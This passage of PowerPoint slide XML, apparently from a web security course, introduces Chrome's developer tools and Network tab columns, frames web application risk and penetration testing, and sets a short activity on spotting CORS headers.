          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Net Inspector Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3317394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A282-C29D-A043-B7C0-CCA3EF7F3535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Inspector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD904DC-C7BD-4C49-BC30-4E302B45788B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1219200"/>
            <a:ext cx="8001000" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Open Chrome, and press: `Ctrl + Shift + I` to open the inspector.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Important Tabs:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Elements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, which allows you to inspect HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, where you can run JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Sources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, which provides information on files used to load the current page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, which contains information about requests/responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, which provides an overview of the page's security.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129064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51CEE-88F1-3345-A3C1-4D0280C147BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Network Tab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81DAE862-62B0-874C-ABDA-6F19FFBFC20D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="1066800"/>
            <a:ext cx="8610600" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>-   The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> column contains the name of the requested file</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> column contains the HTTP response status code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>The  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>column specifies the type of the data in the response body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Initiator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> column specifies the part of the page, or the JavaScript function, that fired the request for the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> column specifies the size of the file, in bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t> Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>column specifies how long it took to fulfill the response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>-   The  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Waterfall  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>column specifies when a request was initiated, and when it was fulfilled, relative to other requests.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2626807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108C5E-DE7B-4128-9C21-5802FB0D3F51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="-76200"/>
            <a:ext cx="9296400" cy="6477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EC75A1-99D2-414B-8A11-92E40ABAE9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4323084"/>
            <a:ext cx="2057400" cy="20769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10BB9B-4963-4F6A-88D8-DB1608880BF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2057400" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCB21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E81DF21-327F-40F2-8F5F-5AFE82228E9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2195779"/>
            <a:ext cx="2057400" cy="1996017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="71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41F8032-02FB-4A3F-990C-B2B63D896A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863" y="2632663"/>
            <a:ext cx="1253537" cy="1253537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47B14A34-B75A-4AEB-8DC9-8AFE5CAAC5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017" y="381000"/>
            <a:ext cx="1324583" cy="1324583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57DE0E0D-5594-4CDF-8EFA-D48D88C5314E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2104106" y="395066"/>
            <a:ext cx="5024965" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi Cond" panose="020B0706030402020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RISK ASSESSMENT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web applications represent a major</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exposed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attack surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06BACF2F-2EA3-47F5-B014-DBE2BBEC6311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="2514600"/>
            <a:ext cx="5740674" cy="1692771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi Cond" panose="020B0706030402020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PENETRATION TESTING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Testing web applications is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>required</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for standards compliance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, as with PCI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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68EC9780-DD73-4E8F-ADB1-2D39AE379888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2104106" y="4614024"/>
            <a:ext cx="6928500" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi Cond" panose="020B0706030402020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SECURITY ENGINEERING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Development teams invest heavily to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>promote and implement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>security best practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C6E079-AE57-4E9E-940B-24E227B43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506" y="4646514"/>
            <a:ext cx="1401094" cy="1401094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4281090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028BFD-AFBF-4EF2-AA2A-EDCADA19AAE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this activity, you’ll watch the Net Inspector as you load a live web page, and look for CORS headers in requested resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Refer to the instructions in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> shared in Slack, and answer the questions contained therein.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Good luck!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4081C5-5AC8-4193-97CA-7B6CB059A5B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: Resource Loading in Action (10 min.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2033124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3DD43-6F3D-41F5-A87E-5F762CDA7524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="-76200"/>
            <a:ext cx="9296400" cy="6477000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="2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F928E86-365C-4CF4-B700-AFE986FFA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2459504"/>
            <a:ext cx="8686800" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Resource Loading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Review </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1945438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2632-98A9-CF41-BDE0-3A46C5A8C405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
